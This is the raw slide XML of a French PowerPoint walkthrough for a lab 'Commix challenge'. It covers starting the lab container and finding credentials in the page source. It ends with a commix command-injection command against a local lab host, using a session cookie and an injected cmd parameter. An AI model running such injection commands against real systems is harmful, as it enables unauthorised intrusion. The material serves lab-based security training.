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8B25A-BE5C-7153-1E98-040B21CE7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BD6D4E-0D6B-37A8-15AF-994D43D39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667FE3-0874-F8F0-0559-974F3B1C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62BD-4D5C-4579-8023-8DE6D87B72E0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A3A640-8576-A7B8-A4EF-938CB860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57F4FA-7A27-364F-B646-5DDCC2C9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37DC-4534-46BE-9C21-5781B01B90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0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0D65D-90F2-C140-CD2F-D3BBEAE0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F37904-B226-76E3-2702-241D89A79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38DB41-8A1C-C224-272F-59628BAF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62BD-4D5C-4579-8023-8DE6D87B72E0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97A627-2B1F-8A75-6845-FC34C09D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3C2BCA-824F-DE46-1FEB-5719FDA2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37DC-4534-46BE-9C21-5781B01B90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58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CF0CABD-5657-7B4B-F682-CA5B68721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E62BF7-500D-1761-A104-8B50E4B2E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FC0464-513B-328C-B141-57AF6519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62BD-4D5C-4579-8023-8DE6D87B72E0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AC5D95-456A-A380-B10A-50AD14C4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9D1714-E6CC-5C35-7815-77B55593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37DC-4534-46BE-9C21-5781B01B90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41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1EEEA-F927-EB1F-7635-99CC9033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7D5EC3-0E2A-455D-18CF-BD8346F6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43429F-7A39-2B70-0584-BA8F0796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62BD-4D5C-4579-8023-8DE6D87B72E0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DA8556-53F5-C068-6012-A366F398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5412E7-BBF4-555B-369D-7CBA718E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37DC-4534-46BE-9C21-5781B01B90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62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D7080-A0E3-62E0-F280-378A0415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8DC439-29CD-641C-D66E-89EC09B1F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3762C4-AFB2-9B78-CA35-4B9A80E2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62BD-4D5C-4579-8023-8DE6D87B72E0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5A7396-0BCF-3B82-8A4A-001CE73B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929702-563B-F070-BA7A-AE560E33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37DC-4534-46BE-9C21-5781B01B90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5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2B86B-1C90-E315-E859-160A41AC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5C87E5-5B06-669B-73D3-877EE2EEE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B192E2-85BB-374E-79FD-66CFABBFD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107198-BB97-8233-D3A2-49864C6B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62BD-4D5C-4579-8023-8DE6D87B72E0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FA4A60-A16F-8DD8-25B0-A358E12B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0116E3-9DFE-30F4-E84E-B0782784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37DC-4534-46BE-9C21-5781B01B90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2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1BD8D-7692-4E3E-7029-79F73D51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BDB3AA-ECEC-E5BF-3E3A-550B1F723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7D526B-8ABF-9DED-8A31-0B39EBEE7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98F4BA-52D7-6EBA-F6F1-E4BACFFCA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CE947D-91DA-177A-34E9-B5D454987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A9FCAB-4213-E5AF-D336-51AEAE29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62BD-4D5C-4579-8023-8DE6D87B72E0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B69A77-850C-AB95-F8FC-CD052EFB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8BDB5C-95D6-AC00-511B-7DCBA8D2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37DC-4534-46BE-9C21-5781B01B90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1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F3853-B9A5-F33F-03BF-311D5ADE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7A83D5F-87E2-845A-168A-7E972B03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62BD-4D5C-4579-8023-8DE6D87B72E0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312A7D-28A8-832E-5B6C-61BE75D2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E8C3F7-6777-B879-36EE-701E25B2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37DC-4534-46BE-9C21-5781B01B90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59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3D5909-E528-99BB-9AC2-E944CEF6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62BD-4D5C-4579-8023-8DE6D87B72E0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E8800F4-C3C7-9B8C-C64D-D5713BB3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D94D08-56B2-973E-0128-A9F9642B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37DC-4534-46BE-9C21-5781B01B90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45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44E3BC-64BC-4C31-E8D7-0FDBB32A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F6D6C9-155A-A879-B045-D44339252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328B545-3EF3-D6FB-745F-99AB40A23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185DAF-5C00-4B0A-CBE5-9551FA78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62BD-4D5C-4579-8023-8DE6D87B72E0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8CE95F-5BA7-B8FA-9D88-B952CC6E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2AC394-7C73-34D6-9E82-01E8E6C0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37DC-4534-46BE-9C21-5781B01B90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6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FE3AA-79EF-AA7E-9B98-F874F8F8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DACE766-0EEB-08F5-B1EE-2023F4E11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12D24D-8171-CB38-C6BB-720FFD2A8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3BB8D0-05EE-D9D6-CD5C-62A83FA7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62BD-4D5C-4579-8023-8DE6D87B72E0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4F07D0-5861-C309-6002-A970C357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A5B893-BA37-4455-5C53-68B8E9F5C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37DC-4534-46BE-9C21-5781B01B90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41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C374DA-6535-6E3E-52E3-7226048C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F19B23-BB06-3229-2B4C-207BC0CA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4BABA0-B77B-2B1A-D2A3-87B1DEA39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662BD-4D5C-4579-8023-8DE6D87B72E0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F6BB58-4391-87F5-AB26-CB402F8B1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AD2ACA-DE9F-9456-A432-AA41AB0B1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837DC-4534-46BE-9C21-5781B01B90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33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CD95B-3456-C648-A747-3B2824704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Solution challenge </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Commix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309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CA927-852B-5E57-B885-B805D5AE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docker-compose up --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>build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5A3C9-3AD2-2E51-D722-8EC895215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récupère le fichier docker-compose</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>On l’exécute avec le commande ci-dessus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>On accède ensuite à la machine avec l’outil </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>commix</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>docker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> –ti </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>commix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> /bin/sh</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="368778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001C2-8756-F8A7-C148-1757B968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view-source:http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>://192.168.60.3/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4FF0FC-A378-95E2-A4E4-7B7E6D5AA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986" y="1690688"/>
            <a:ext cx="3353091" cy="282726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18F0C7F-4072-060C-5058-B5A527177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003" y="4709152"/>
            <a:ext cx="4606373" cy="45816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971B69B-682B-2745-88E1-20D93C5B6742}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2782669"/>
            <a:ext cx="600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site nous demande se connecter.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les identifiants sont trouvables dans le code source</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="162357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89A9C42-BB8A-0FF8-71DB-9F38AC185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184" y="210603"/>
            <a:ext cx="9487722" cy="4077053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46012F-1DE9-E10E-FCE4-3F593CD24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13" y="3097162"/>
            <a:ext cx="6486832" cy="213360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Ici la commande exécutée par défaut est ls</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="369038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7CCDC9-05D4-8A9B-E5E0-187BB4B0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Inspecter la page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0F6F6C-CEBD-E10A-8A1A-8AFEAA8EC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7072"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>On peut utiliser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>burp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> suite ou simplement en inspectant la page pour récupérer les cookies et la requête envoyée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A7DD99-D4F0-6B95-FF46-1EB9F865E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80" y="2772697"/>
            <a:ext cx="9499708" cy="94707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B3E708F-0B53-A224-CD37-D3B2F9F9E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079" y="3805707"/>
            <a:ext cx="9499709" cy="109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9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E024E-505F-3870-9CF8-952E63DD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2747" cy="1040889"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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commix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-u ‘’http://192.168.60.3/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protected.php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’’ –cookie= ‘’admin; PHPSESSID=&lt;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id_session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&gt;’’ –data=’’cmd=-la’’ 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3D223B-D391-6EEF-4216-69918C919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750" y="1261635"/>
            <a:ext cx="8835138" cy="26045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68C7BAF-9CF7-60F4-2B7F-55669AF6D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750" y="4213969"/>
            <a:ext cx="8788648" cy="117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221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Grand écran</PresentationFormat>
  <Paragraphs>13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Solution challenge Commix</vt:lpstr>
      <vt:lpstr>docker-compose up --build</vt:lpstr>
      <vt:lpstr>view-source:http://192.168.60.3/</vt:lpstr>
      <vt:lpstr>Présentation PowerPoint</vt:lpstr>
      <vt:lpstr>Inspecter la page</vt:lpstr>
      <vt:lpstr>commix -u ‘’http://192.168.60.3/protected.php’’ –cookie= ‘’admin; PHPSESSID=&lt;id_session&gt;’’ –data=’’cmd=-la’’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challenge Commix</dc:title>
  <dc:creator>Arthur WANG</dc:creator>
  <cp:lastModifiedBy>Arthur WANG</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-04-11T12:28:26Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-11T12:28:52Z</dcterms:modified>
</cp:coreProperties>
</file>